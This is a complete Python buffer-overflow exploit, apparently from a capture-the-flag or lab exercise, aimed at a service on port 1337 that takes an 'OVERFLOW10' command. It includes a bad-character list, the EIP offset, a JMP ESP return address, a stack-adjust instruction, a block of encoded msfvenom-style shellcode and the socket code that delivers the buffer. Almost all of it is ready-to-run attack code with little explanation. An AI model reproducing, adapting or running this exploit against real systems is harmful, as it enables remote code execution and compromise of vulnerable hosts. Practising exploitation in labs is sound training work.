Example payload scripts
Badchars (bytes the target mangles; they must not appear anywhere in the payload after the prefix — neither in the return address nor in the shellcode): \x00\xa0\xad\xbe\xde\xef
Exploit code
#!/usr/bin/env python3
import socket
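ip = "MACHINE_IP"  # target host; replace with the lab machine's address
port = 1337
buf_length = 1000  # bytes sent after the prefix, not counting the trailing CRLF
prefix = "OVERFLOW10 "
offset = 537  # EIP offset: bytes of padding before the saved return pointer

# Bytes the target mangles (see the "Badchars" line above). None of them may
# appear in the payload after the prefix, or the overflow lands corrupted.
badchars = b"\x00\xa0\xad\xbe\xde\xef"

# Address of a JMP ESP gadget, little-endian (0x62501205). It overwrites the
# saved return pointer so that RET lands on the bytes that follow it.
jmp_esp = b"\x05\x12\x50\x62"

# First instruction executed after JMP ESP. This is NOT a NOP sled:
# 83 EC 10 decodes to `sub esp, 0x10`. Presumably it moves ESP below the
# payload so that stack writes made by the decoder stub (the call/pop at the
# start of the shellcode) do not overwrite the shellcode while it unpacks in
# place -- confirm the margin in a debugger if the payload is changed.
stack_adjust = b"\x83\xec\x10"

# Encoded shellcode (looks like an msfvenom shikata_ga_nai-style stub: it
# rewrites itself in place, so it must execute from writable memory, which the
# stack is here). Regenerate it with the badchars above excluded if you swap
# the payload.
shellcode = (
    b"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
    b"\x11\xab\x0e\x07\x83\xee\xfc\xe2\xf4\xed\x43\x8c\x07\x11\xab"
    b"\x6e\x8e\xf4\x9a\xce\x63\x9a\xfb\x3e\x8c\x43\xa7\x85\x55\x05"
    b"\x20\x7c\x2f\x1e\x1c\x44\x21\x20\x54\xa2\x3b\x70\xd7\x0c\x2b"
    b"\x31\x6a\xc1\x0a\x10\x6c\xec\xf5\x43\xfc\x85\x55\x01\x20\x44"
    b"\x3b\x9a\xe7\x1f\x7f\xf2\xe3\x0f\xd6\x40\x20\x57\x27\x10\x78"
    b"\x85\x4e\x09\x48\x34\x4e\x9a\x9f\x85\x06\xc7\x9a\xf1\xab\xd0"
    b"\x64\x03\x06\xd6\x93\xee\x72\xe7\xa8\x73\xff\x2a\xd6\x2a\x72"
    b"\xf5\xf3\x85\x5f\x35\xaa\xdd\x61\x9a\xa7\x45\x8c\x49\xb7\x0f"
    b"\xd4\x9a\xaf\x85\x06\xc1\x22\x4a\x23\x35\xf0\x55\x66\x48\xf1"
    b"\x5f\xf8\xf1\xf4\x51\x5d\x9a\xb9\xe5\x8a\x4c\xc3\x3d\x35\x11"
    b"\xab\x66\x70\x62\x99\x51\x53\x79\xe7\x79\x21\x16\x54\xdb\xbf"
    b"\x81\xaa\x0e\x07\x38\x6f\x5a\x57\x79\x82\x8e\x6c\x11\x54\xdb"
    b"\x57\x41\xfb\x5e\x47\x41\xeb\x5e\x6f\xfb\xa4\xd1\xe7\xee\x7e"
    b"\x99\x6d\x14\xc3\xce\xaf\x61\x2b\x66\x05\x11\xaa\xb5\x8e\xf7"
    b"\xc1\x1e\x51\x46\xc3\x97\xa2\x65\xca\xf1\xd2\x94\x6b\x7a\x0b"
    b"\xee\xe5\x06\x72\xfd\xc3\xfe\xb2\xb3\xfd\xf1\xd2\x79\xc8\x63"
    b"\x63\x11\x22\xed\x50\x46\xfc\x3f\xf1\x7b\xb9\x57\x51\xf3\x56"
    b"\x68\xc0\x55\x8f\x32\x06\x10\x26\x4a\x23\x01\x6d\x0e\x43\x45"
    b"\xfb\x58\x51\x47\xed\x58\x49\x47\xfd\x5d\x51\x79\xd2\xc2\x38"
    b"\x97\x54\xdb\x8e\xf1\xe5\x58\x41\xee\x9b\x66\x0f\x96\xb6\x6e"
    b"\xf8\xc4\x10\xee\x1a\x3b\xa1\x66\xa1\x84\x16\x93\xf8\xc4\x97"
    b"\x08\x7b\x1b\x2b\xf5\xe7\x64\xae\xb5\x40\x02\xd9\x61\x6d\x11"
    b"\xf8\xf1\xd2"
)


def build_buffer(
    prefix=prefix,
    offset=offset,
    jmp_esp=jmp_esp,
    stack_adjust=stack_adjust,
    shellcode=shellcode,
    buf_length=buf_length,
    badchars=badchars,
):
    """Assemble the overflow buffer and return it as bytes.

    Layout after the prefix: ``offset`` bytes of "A" padding, the JMP ESP
    address, the stack adjustment, the shellcode, then "D" padding up to
    ``buf_length`` bytes, followed by CRLF.

    Args:
        prefix: Command string the target expects before the overflowing field.
        offset: Bytes of padding before the saved return pointer.
        jmp_esp: Little-endian address written over the return pointer.
        stack_adjust: Instruction bytes executed first after JMP ESP.
        shellcode: Payload executed after ``stack_adjust``.
        buf_length: Total size of everything sent after the prefix (CRLF excluded).
        badchars: Bytes that must not appear after the prefix.

    Returns:
        The complete buffer, prefix and trailing CRLF included.

    Raises:
        ValueError: if the padding + address + shellcode overshoot ``buf_length``
            (the original silently dropped the trailing padding in that case),
            or if any of ``badchars`` occurs after the prefix.
    """
    payload = b"A" * offset + jmp_esp + stack_adjust + shellcode
    if len(payload) > buf_length:
        raise ValueError(
            "payload is {} bytes but buf_length is {}".format(len(payload), buf_length)
        )
    payload += b"D" * (buf_length - len(payload))  # trail padding to a fixed size
    found = sorted({c for c in badchars if c in payload})
    if found:
        raise ValueError(
            "payload contains badchars: " + ", ".join("0x%02x" % c for c in found)
        )
    # The original built a str and encoded it as latin-1; every byte above is
    # < 0x100 so building bytes directly yields the identical wire format.
    return prefix.encode("latin-1") + payload + b"\r\n"


def main():
    """Connect to ``ip``:``port`` and deliver the crafted buffer."""
    buffer = build_buffer()
    payload_len = len(buffer) - len(prefix) - 2  # bytes after the prefix, CRLF excluded
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            s.connect((ip, port))
        except OSError:
            print("[-] Could not connect.")
            return
        print("[+] Sending evil buffer of {} bytes...".format(payload_len))
        try:
            # sendall: a bare send() may write only part of the buffer and
            # return early, truncating the overflow.
            s.sendall(buffer)
        except OSError as exc:
            print("[-] Send failed: {}".format(exc))
            return
        print("[+] Done!")


if __name__ == "__main__":
    main()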